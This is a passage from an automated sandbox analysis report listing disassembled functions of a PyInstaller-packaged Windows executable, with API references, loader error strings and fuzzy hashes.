                                                                                                                                                                      • Instruction Fuzzy Hash: 6BF06271B182958AEBA48F29A80262977D0F7083C0F90C079E68DC3F19DA3C90609F04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313DC710 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fdbee4fad9149f43b0549b24f63ddcf589465060abdbd2c7e422564efb120403
                                                                                                                                                                      • Instruction ID: fec13f9f61f8e9a3a0dbe4364e90bdbbe03619e04b2a14a3a219a69297c8de7c
                                                                                                                                                                      • Opcode Fuzzy Hash: fdbee4fad9149f43b0549b24f63ddcf589465060abdbd2c7e422564efb120403
                                                                                                                                                                      • Instruction Fuzzy Hash: 20A00271D1CC42D4FB448B00E8501306370FF54340B410035D01DD22A4DF3CB640E310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D6EA0 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                      • API String ID: 190572456-2208601799
                                                                                                                                                                      • Opcode ID: e6820c89ffc797338b1e8a8d4cbcd85ec8fabaf342805483d76abf8d02486c55
                                                                                                                                                                      • Instruction ID: c24ae280751bfbf10a5953f8bc46721c48467def050e6e8cf8400a57a8b82855
                                                                                                                                                                      • Opcode Fuzzy Hash: e6820c89ffc797338b1e8a8d4cbcd85ec8fabaf342805483d76abf8d02486c55
                                                                                                                                                                      • Instruction Fuzzy Hash: 26E1B0A4E4EB0390FB59DB15EC5857463E6AF18794F885035C82E863A9EF7CF568B300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D12B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message_fread_nolock
                                                                                                                                                                      • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                                      • API String ID: 3065259568-2316137593
                                                                                                                                                                      • Opcode ID: c5a2c1d02429908984cb2a7410400eb3092e6fd9a18cd193dcde8c91d8c94b8a
                                                                                                                                                                      • Instruction ID: 89751dfa800bfa3152dd623e5241c310b804d97e9920daa0903b033b23253dc3
                                                                                                                                                                      • Opcode Fuzzy Hash: c5a2c1d02429908984cb2a7410400eb3092e6fd9a18cd193dcde8c91d8c94b8a
                                                                                                                                                                      • Instruction Fuzzy Hash: 8251A272F0968346FB20A721A8516FA63A4EF447C4F805031EE5DD7B8AEE7CE945E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D2390 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                      • String ID: P%
                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                      • Opcode ID: 3a5fe543bfe1b7b5f8464788b1726589a381fe5977aa523128c49ed64eb0cea2
                                                                                                                                                                      • Instruction ID: 0cf9eefb627f5e71c1a5010a9dc794792bdfa451dd4aee713e6db57297f37842
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a5fe543bfe1b7b5f8464788b1726589a381fe5977aa523128c49ed64eb0cea2
                                                                                                                                                                      • Instruction Fuzzy Hash: B151C876A187A186E7349F26A4181BAB7A1FB98B61F004135EFDE83794DF3CD085DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E6654 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: -$:$f$p$p
                                                                                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                                                                                      • Opcode ID: 91dceeff07302928ce321c951f00c79f44960f322cb111e7c2f38567437031ff
                                                                                                                                                                      • Instruction ID: efce9e36e3c0065a7891649569de4de3a82a7ed336bbb7df2ee4b04fc7d5b784
                                                                                                                                                                      • Opcode Fuzzy Hash: 91dceeff07302928ce321c951f00c79f44960f322cb111e7c2f38567437031ff
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E12A1F3E4C34386FF209A15D1542BA76A1EB40754F84A135E68A877C4DF3DEE90AB24
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E10B8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                      • Opcode ID: 57be4d3235f3c7e7fe9cc3e0119ba00d32c026717cad99bda61a19a4716f3002
                                                                                                                                                                      • Instruction ID: d91d82647ba3b379cf16e8491b637dabb3a313458bde9b280da587177a1ebc40
                                                                                                                                                                      • Opcode Fuzzy Hash: 57be4d3235f3c7e7fe9cc3e0119ba00d32c026717cad99bda61a19a4716f3002
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A12A363E0C34386FF609A54D0546BAF6A2FB40754F885135E69A867C4DF7CEE80AF60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D15A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                      • API String ID: 2030045667-3659356012
                                                                                                                                                                      • Opcode ID: d99f9d24bbdf0239836503ea78f40cd922292515af28383286336b1a69721e40
                                                                                                                                                                      • Instruction ID: b0073a057cd155cbe295ab5f8ba3464a3402007798de45b0271fdd14f0cdb0b1
                                                                                                                                                                      • Opcode Fuzzy Hash: d99f9d24bbdf0239836503ea78f40cd922292515af28383286336b1a69721e40
                                                                                                                                                                      • Instruction Fuzzy Hash: DD319262F0C68386FB24DB51E4405BA63A0EF447D4F885031EE4D97B99EE3CE546E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313DEAB0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                      • Opcode ID: 9909e2f83e20015404d87d33da3216204588829881f8faf41da18fa3cf6f00f4
                                                                                                                                                                      • Instruction ID: 6afdc91cc7264e5459369ab46440c870da95aaa9114d19a318918b261e15fa93
                                                                                                                                                                      • Opcode Fuzzy Hash: 9909e2f83e20015404d87d33da3216204588829881f8faf41da18fa3cf6f00f4
                                                                                                                                                                      • Instruction Fuzzy Hash: 4DE18B72E09B418AFB209B65D4802AD7BA4FF45B88F000535EE8D87B99DF38E4A1D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D8660 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D86F7
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D874E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                      • API String ID: 626452242-27947307
                                                                                                                                                                      • Opcode ID: a50a3382255a541c5b3d0560de10b3a042d6b3b0c1d5a170ef61a2fd4a810dcd
                                                                                                                                                                      • Instruction ID: 2f1f5e0dbfe634f8b8c16e6c5e2b58e04f17efaee505bcde1435e7f0ac595767
                                                                                                                                                                      • Opcode Fuzzy Hash: a50a3382255a541c5b3d0560de10b3a042d6b3b0c1d5a170ef61a2fd4a810dcd
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C416D32A08B8282F720DF15B84017AB6A1FF88B90F554135EA9DC7BA4DF3CE456E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D8BA0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00007FF6313D399A), ref: 00007FF6313D8BE1
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6313D87A2,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D29B4
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: MessageBoxW.USER32 ref: 00007FF6313D2A90
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00007FF6313D399A), ref: 00007FF6313D8C55
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                      • API String ID: 3723044601-27947307
                                                                                                                                                                      • Opcode ID: a488ca790df3690b379957bbac8251e95929e4a53950f3e8fd867653a66a7dcb
                                                                                                                                                                      • Instruction ID: b12456d866014b28d8b9b8fc3fa9c3bdac6623b421eab79e6aa25860f8c37859
                                                                                                                                                                      • Opcode Fuzzy Hash: a488ca790df3690b379957bbac8251e95929e4a53950f3e8fd867653a66a7dcb
                                                                                                                                                                      • Instruction Fuzzy Hash: 8E215762E09B42C5FB10DF26AC44179B7A1EF88BD0B584135DA5DC37A4EF3CE556A340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D7550 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                                      • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                                      • API String ID: 3231891352-3501660386
                                                                                                                                                                      • Opcode ID: 68fd338641d636d5815f3b665ffc9053a51abf66e87a31f69d250664ace4db6a
                                                                                                                                                                      • Instruction ID: 5926e21effe1d4530386595cfc3004913d9b3a1f0d39ad72d05e51c57f94c1a7
                                                                                                                                                                      • Opcode Fuzzy Hash: 68fd338641d636d5815f3b665ffc9053a51abf66e87a31f69d250664ace4db6a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A51BF61F0D24341FB20AB26A9503F962959F85BD8F485431EE5DCB7DAEE3CE904A350
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D73D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF6313D8A90: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6313D2A5B), ref: 00007FF6313D8ACA
                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6313D7951,00000000,?,00000000,00000000,?,00007FF6313D154F), ref: 00007FF6313D742F
                                                                                                                                                                        • Part of subcall function 00007FF6313D2AD0: MessageBoxW.USER32 ref: 00007FF6313D2BA5
                                                                                                                                                                      Strings
                                                                                                                                                                      • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6313D7443
                                                                                                                                                                      • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6313D7406
                                                                                                                                                                      • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6313D748A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                      • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                      • API String ID: 1662231829-3498232454
                                                                                                                                                                      • Opcode ID: e5ac64639ba5b6db894796e8b343d4fc1853aedb28ed0cb5364be08b25f1faa7
                                                                                                                                                                      • Instruction ID: 109c7812a4489b8d693f2305dad419b3ff68022c417f8a36b5d36216e4ccfa1d
                                                                                                                                                                      • Opcode Fuzzy Hash: e5ac64639ba5b6db894796e8b343d4fc1853aedb28ed0cb5364be08b25f1faa7
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B319051F1D78380FB25AB21E9153BA6291AF987C4F844435DA4ED27DAEE3CE608A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313DDD68 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF6313DE01A,?,?,?,00007FF6313DDD0C,?,?,00000001,00007FF6313DD929), ref: 00007FF6313DDDED
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF6313DE01A,?,?,?,00007FF6313DDD0C,?,?,00000001,00007FF6313DD929), ref: 00007FF6313DDDFB
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF6313DE01A,?,?,?,00007FF6313DDD0C,?,?,00000001,00007FF6313DD929), ref: 00007FF6313DDE25
